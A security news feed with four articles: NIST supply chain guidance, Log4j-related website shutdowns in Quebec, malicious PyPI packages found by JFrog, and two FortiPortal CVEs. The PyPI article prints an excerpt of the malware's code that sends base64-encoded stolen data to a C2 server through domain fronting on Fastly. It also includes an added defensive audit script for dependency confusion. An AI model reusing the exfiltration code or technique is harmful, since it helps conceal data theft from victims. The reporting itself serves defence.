Information Security News | Cyber Security | Hacking Tutorial (https://www.securitynewspaper.com/), feed built Wed, 11 May 2022 20:49:49 +0000

NIST updates the Cybersecurity Supply Chain Risk Management Guidance (C-SCRM) in Response to Executive Order Signed by President Biden
Published Wed, 11 May 2022 20:49:46 +0000, https://www.securitynewspaper.com/2022/05/11/nist-updates-the-cybersecurity-supply-chain-risk-management-guidance-c-scrm-in-response-to-executive-order-signed-by-president-biden/

The U.S. National Institute of Standards and Technology (NIST) has revised the Cybersecurity Supply Chain Risk Management Guidance (C-SCRM), developed at the request of President Joe Biden to provide advice for the identification, assessment and control of cybersecurity risks throughout the supply chain.

The document, titled “Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations”, invites buyers and end users of digital hardware, software, and services to conduct due diligence on the origin and security of components of a digital/technology product.

Supply chain attacks have become one of the most dangerous classes of attack, since they let threat actors compromise many organizations at once by tampering with, or exploiting vulnerabilities in, components that are widely used. The SolarWinds attack, which impacted thousands of organizations worldwide, is the clearest reminder.

For Ilkka Turunen, software supply chain security specialist at Sonatype, these measures are important to substantially improve the security of organizations: “This document outlines fundamental best practices, such as generating software bills of materials (SBOM), as well as describing the maintenance activities necessary to maintain effective security practices in the supply chain.”

The researcher adds that software risk mitigation begins with understanding how the use of managed and unmanaged software occurs in an organization, in addition to the progressive mitigation of those risks at the vendor level and with the constant participation of customers.

Separately, Cequence Security experts recently alerted the cybersecurity community that attacks exploiting flaws such as Log4Shell persist. Disclosed a few months ago, Log4Shell allows abuse of the Apache Log4j logging library, a component considered ubiquitous.

A new wave of attacks, which Cequence calls LoNg4j, illustrates how tightly modern enterprise IT infrastructure is coupled to the digital supply chain: the vulnerable library is spread across all kinds of applications, so a single exploitable flaw becomes a critical attack vector for every one of them.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

Canada shuts down 4,000 government websites fearing cyberattacks exploiting a critical vulnerability in Log4j
Published Mon, 13 Dec 2021 17:15:54 +0000, https://www.securitynewspaper.com/2021/12/13/canada-shuts-down-4000-government-websites-fearing-cyberattacks-exploiting-a-critical-vulnerability-in-log4j/

As a preventive measure, the province of Quebec, Canada, decided to shut down some 4,000 government websites because of the risk of exploitation of a critical vulnerability in a popular logging library. Éric Caire, the province's minister of digital transformation, said the vulnerability would put online platforms in the education, health and public administration sectors at risk of cyberattack.

The official assures that so far no exploitation attempts have been detected in government platforms, so the measure is completely preventive: “The risk is critical and according to the new protocols of the head of IT, we must close the vulnerable systems,” says Caire.

The risk stems from a critical vulnerability in the Apache Log4j logging library. Because most Quebec government websites use this library, their operation was suspended temporarily, and they will not be available again until the flaws in Log4j are addressed. Most of the vulnerable websites see little traffic, so authorities expect the outage to have minimal impact on users.

Detecting whether a system is affected is relatively simple, although depending on how system administrators approach the remediation, the process could take a few days.

In this regard, cybersecurity specialist Eric Parent recommends adopting a systemic approach to address this class of vulnerabilities and thus minimize the risk of exploitation: “We have identified various threat actors exploiting this vulnerability, so it is better to be prepared.” The researcher concludes by mentioning that the best security recommendation is to shut down everything and restart the systems when the risk passes.

Other organizations have warned about this security risk; in recent days, multiple websites frequented by players of the popular video game Minecraft warned about exploitation of this vulnerability, which puts the game's players at risk as well.

Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors
Published Mon, 22 Nov 2021 23:23:37 +0000, https://www.securitynewspaper.com/2021/11/22/researchers-find-11-malicious-python-packages-in-the-pypi-repository-that-can-steal-access-tokens-passwords-and-create-backdoors/

Security specialists from the firm JFrog report the discovery of 11 malicious Python packages in the Python Package Index (PyPI) repository, apparently designed to steal access tokens for platforms such as Discord, intercept passwords and carry out dependency confusion attacks.

The list of malicious packages detected in this research is shown below:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10/10Cent11
  • yandex-yt
  • yiffparty

Among these packages, experts note that “importantpackage”, “10Cent10” and “10Cent11” appear to establish a reverse shell on the compromised machine. In addition, “importantpackage” abuses TLS termination at the CDN for data theft, using Fastly's CDN to hide its malicious communications with the C&C server.

According to the report, the communication code for this malware is (excerpt; `request` is Python's urllib.request module and `b64_payload` holds the base64-encoded stolen data):

    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload

    r = request.Request(url, headers={"Host": "psec.forward.io.global.prod.fastly.net"})

The researchers note that this code sends an HTTPS request to pypi.python.org, a host fronted by Fastly, while the overriding Host header makes the CDN forward the decrypted request as plain HTTP to the C2 backend psec.forward.io.global.prod.fastly.net. To a network observer, the traffic looks like an ordinary connection to PyPI.

The dependency confusion technique involves publishing to a public repository malicious packages that carry the same name as legitimate internal private packages but a higher version number. Package managers configured to consult both a private and a public index resolve the name to the highest version available, so they download and install the malicious module instead of the internal one.
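As an added defender-side illustration of the dependency confusion risk described above (this is not code from the JFrog report or from the malicious packages), the audit function below takes an organization's internal package inventory and a snapshot of what a public index returns, applies the PEP 503 name normalization that pip uses (so `importantpackage` and `important-package` are treated as the same package), and flags every internal name that also exists publicly, noting whether the public version would win a highest-version resolution. All package names, versions and the index snapshot are constructed sample data.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample data (assumption, not from the report): internal package
# inventory and a snapshot of a public index. Spellings differ on purpose.
INTERNAL_PACKAGES: Dict[str, str] = {
    "Important_Package": "1.4.0",
    "payments-core": "2.1.3",
    "reporting.tools": "0.9.1",
}
PUBLIC_INDEX_SNAPSHOT: Dict[str, List[str]] = {
    "important-package": ["1.0.0", "99.0.0"],  # same name, far higher version
    "payments-core": ["1.0.0"],                 # same name, lower version
    "requests": ["2.27.1"],                     # unrelated public package
}


def normalize(name: str) -> str:
    """PEP 503 normalization: pip treats all these spellings as one package."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(version: str) -> Tuple[int, ...]:
    """Numeric release-segment parsing (enough for versions like 1.4.0)."""
    return tuple(int(part) for part in version.split("."))


def find_confusion_candidates(internal: Dict[str, str],
                              public: Dict[str, List[str]]) -> List[dict]:
    """Return internal packages whose normalized name also exists on the
    public index, with the highest public version and whether a package
    manager picking the highest version across indexes would prefer it."""
    public_by_name = {normalize(n): versions for n, versions in public.items()}
    findings = []
    for name, internal_version in internal.items():
        key = normalize(name)
        if key not in public_by_name:
            continue  # name is not shadowed publicly
        top_public = max(public_by_name[key], key=parse_version)
        findings.append({
            "package": key,
            "internal": internal_version,
            "public_max": top_public,
            "public_wins": parse_version(top_public) > parse_version(internal_version),
        })
    return findings


if __name__ == "__main__":
    for finding in find_confusion_candidates(INTERNAL_PACKAGES, PUBLIC_INDEX_SNAPSHOT):
        print(finding)
```

A finding with `public_wins` set is the case to act on: reserve the name on the public index or pin the private index per package rather than relying on a mixed index configuration.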

The researchers conclude that although this attack resembles other known techniques, it gives threat actors a stealthy foothold and could serve as the prelude to subsequent attacks.

2 critical vulnerabilities in Fortinet FortiPortal
Published Wed, 17 Nov 2021 00:25:53 +0000, https://www.securitynewspaper.com/2021/11/16/2-critical-vulnerabilities-in-fortinet-fortiportal/

Cybersecurity specialists reported the finding of two vulnerabilities in Fortinet FortiPortal. According to the report, successful exploitation of these flaws would allow the deployment of multiple attack scenarios.

Below is a brief description of the reported flaws, together with their CVE identifiers and the score assigned under the Common Vulnerability Scoring System (CVSS).

CVE-2021-36176: Improper sanitization of user-supplied data in both the customer and provider interfaces would allow remote threat actors to send specially crafted links to target users and run arbitrary HTML and script code in the users' browsers.

This is a low severity flaw and received a CVSS score of 5.3/10.

CVE-2021-32595: The affected application does not properly control consumption of internal resources in the web interface, which would allow remote malicious hackers to trigger a denial of service (DoS) condition.

This is a medium severity flaw and received a CVSS score of 6.7/10.

Experts mention that the flaws reside in the following versions of FortiPortal: 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.1.1, 4.1.2, 4.2.1, 4.2.2, 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.1.0, 5.1.1, 5.1.2, 5.2.0, 5.2.1, 5.2.2, 5.2.3, 5.2.4, 5.2.5, 5.3.0, 5.3.1, 5.3.2, 5.3.3, 5.3.4, 5.3.5, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4 & 6.0.5.

Cybersecurity specialists recommend that admins of affected deployments install the latest updates as soon as possible to mitigate the exploitation risk.
